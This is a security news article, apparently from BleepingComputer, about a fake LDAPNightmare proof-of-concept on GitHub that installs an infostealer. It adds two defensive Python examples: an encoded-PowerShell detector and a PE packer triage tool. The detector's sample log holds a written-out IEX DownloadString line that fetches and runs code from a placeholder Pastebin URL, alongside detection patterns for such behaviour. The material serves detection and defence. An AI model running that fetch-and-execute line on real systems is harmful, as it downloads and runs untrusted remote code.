Fake LDAPNightmware exploit on GitHub spreads infostealer malware – BleepingComputer
A deceptive proof-of-concept (PoC) exploit for CVE-2024-49113 (aka “LDAPNightmare”) on GitHub infects users with infostealer malware that exfiltrates sensitive data to an external FTP server.

The tactic isn’t novel, as there have been multiple documented cases of malicious tools disguised as PoC exploits on GitHub.

However, this case, discovered by Trend Micro, highlights that threat actors continue to use the tactic to trick unsuspecting users into infecting themselves with malware.

Trend Micro reports that the malicious GitHub repository contains a project that appears to have been forked from SafeBreach Labs’ legitimate PoC for CVE-2024-49113, published on January 1, 2025.

The flaw is one of two impacting Windows Lightweight Directory Access Protocol (LDAP) that Microsoft fixed in its December 2024 Patch Tuesday, the other being a critical remote code execution (RCE) problem tracked as CVE-2024-49112.

SafeBreach’s initial blog post about the PoC wrongly mentioned CVE-2024-49112, whereas their PoC was for CVE-2024-49113, a lower-severity denial-of-service vulnerability.

This mistake, even though corrected later, created higher interest and buzz around LDAPNightmare and its potential for attacks, which is probably what the threat actors attempted to take advantage of.

Users downloading the PoC from the malicious repository get a UPX-packed executable, ‘poc.exe’, which, upon execution, drops a PowerShell script in the victim’s %Temp% folder.

The script creates a scheduled job on the compromised system, which executes an encoded script that fetches a third script from Pastebin.

This final payload collects computer information, process lists, directory lists, the IP address, and network adapter information, as well as installed updates, and uploads them as a ZIP archive to an external FTP server using hardcoded credentials.

A list of the indicators of compromise for this attack can be found here.

GitHub users sourcing public exploits for research or testing need to exercise caution and ideally only trust cybersecurity firms and researchers with a good reputation.

Threat actors have attempted to impersonate well-known security researchers in the past, so validating repository authenticity is also crucial.

If possible, review the code before executing it on your system, upload binaries to VirusTotal, and skip anything that appears obfuscated.
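The infection chain described above (a scheduled job running an encoded PowerShell command that pulls a further stage from Pastebin and exfiltrates over FTP) leaves a recognisable trace in process-creation and task-creation logs. The following detector is an added example written for this article, not code from BleepingComputer or Trend Micro: it decodes any `-EncodedCommand` argument it finds in a log line (PowerShell accepts the abbreviations `-e`, `-ec`, `-enc` and longer prefixes, and the payload is base64 of UTF-16LE text) and reports which indicators the decoded script matches. The log lines, the `key=value` record layout, the indicator names and the Pastebin URL are all constructed for the example.

```python
"""Flag encoded PowerShell that resembles the LDAPNightmare-lookalike chain:
an -EncodedCommand stage that fetches from pastebin.com or exfiltrates over FTP.
All log lines below are constructed for this example, not real telemetry."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?<![\w-])-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours from the article's chain, expressed as patterns over the decoded script.
INDICATORS = {
    "pastebin_fetch": re.compile(r"pastebin\.com", re.I),
    "remote_download": re.compile(r"DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "ftp_exfil": re.compile(r"ftp://[^\s'\"]+", re.I),
    "temp_drop": re.compile(r"%Temp%|\$env:TEMP", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded script behind an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError subclass
        return None


def analyse_line(line: str) -> dict:
    """Decode any encoded command in one log line and list the indicators that fire."""
    script = decode_encoded_command(line)
    hits = [name for name, rx in INDICATORS.items() if script and rx.search(script)]
    return {
        "encoded": script is not None,
        "script": script,
        "hits": hits,
        # A Temp drop alone is normal admin noise; a paste-site fetch or FTP upload is not.
        "suspicious": "pastebin_fetch" in hits or "ftp_exfil" in hits,
    }


def scan(lines):
    """Return only the records worth an analyst's attention."""
    return [r for r in (analyse_line(l) for l in lines) if r["suspicious"]]


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample: three process-creation records in a simplified key=value layout.
# Only the second mirrors the chain in the article; the Pastebin path is a placeholder.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/EXAMPLE_ID')"
SAMPLE_LOG = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -NoP -W Hidden -enc " + encode_ps(STAGE2),
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell.exe -enc " + encode_ps("Get-Date | Out-File $env:TEMP\\heartbeat.txt"),
]

if __name__ == "__main__":
    for record in scan(SAMPLE_LOG):
        print(record["hits"], "->", record["script"])
```

The same function works on the `Command` element of a Security event 4698 (scheduled task created) or on a Sysmon event 1 command line, since it only needs the text containing the switch; on real data, decode first and alert on the decoded content, because the base64 form defeats plain keyword matching.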
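The closing advice (review the code, submit binaries to VirusTotal, skip anything obfuscated) can be partly automated before a downloaded PoC is ever run. The triage routine below is an added example written for this article, not code from BleepingComputer or Trend Micro: it parses the PE section table without any third-party library, flags the `UPX0`/`UPX1` section names that UPX writes by default, measures per-section Shannon entropy as a packer heuristic (the 7.0 threshold is an assumption, not a standard), and returns the SHA-256 to look up on VirusTotal. The two sample executables are minimal PE images assembled in the block itself, so the run is self-contained.

```python
"""Pre-execution triage for a downloaded binary: section names, entropy and hash.
The PE images used below are constructed in this file, not real samples."""
import hashlib
import math
import random
import struct
from collections import Counter

ENTROPY_THRESHOLD = 7.0  # assumed heuristic; compressed/encrypted data sits near 8.0


def shannon_entropy(buf: bytes) -> float:
    """Bits of entropy per byte (0.0 for empty input)."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pe_sections(data: bytes):
    """Walk the COFF section table and return name, raw size and entropy per section."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size
    out = []
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, table + 40 * i)
        blob = data[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        out.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                    "raw_size": raw_size, "entropy": shannon_entropy(blob)})
    return out


def triage(data: bytes) -> dict:
    """Summarise what a reviewer would want to know before running the file."""
    secs = pe_sections(data)
    packer_names = [s["name"] for s in secs if s["name"].upper().startswith("UPX")]
    high_entropy = [s["name"] for s in secs if s["entropy"] > ENTROPY_THRESHOLD]
    return {
        "sha256": hashlib.sha256(data).hexdigest(),   # look this up on VirusTotal
        "sections": [s["name"] for s in secs],
        "upx_packed": bool(packer_names),             # default UPX section names
        "high_entropy_sections": high_entropy,        # catches renamed-section packers too
        "recommend_skip": bool(packer_names) or bool(high_entropy),
    }


def build_pe(sections):
    """Assemble a minimal PE32 image (DOS stub, COFF header, blank optional header,
    section table, raw data). Enough structure to parse; not a loadable program."""
    opt_size, e_lfanew = 0xE0, 0x40
    raw_off = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)  # PE32 magic, rest zeroed
    table, blobs = b"", b""
    for name, blob in sections:
        ptr = raw_off + len(blobs) if blob else 0
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                             len(blob) or 0x1000, 0x1000, len(blob), ptr, 0, 0, 0, 0, 0x60000020)
        blobs += blob
    return dos + coff + opt + table + blobs


# Constructed samples: an unpacked layout and a UPX-style layout whose UPX1
# section holds deterministic pseudo-random bytes standing in for compressed code.
_rng = random.Random(42)
PLAIN_SAMPLE = build_pe([(".text", b"\x90" * 200 + bytes(range(64))),
                         (".data", b"config=1\0" * 20)])
PACKED_SAMPLE = build_pe([("UPX0", b""),
                          ("UPX1", bytes(_rng.getrandbits(8) for _ in range(4096))),
                          (".rsrc", b"\0" * 64)])

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("packed", PACKED_SAMPLE)):
        print(label, triage(sample))
```

A clean section list is not proof of safety (the article's point is that the repository itself was the lure), but a UPX-packed `poc.exe` arriving with source that supposedly builds it is exactly the mismatch the advice tells readers to walk away from.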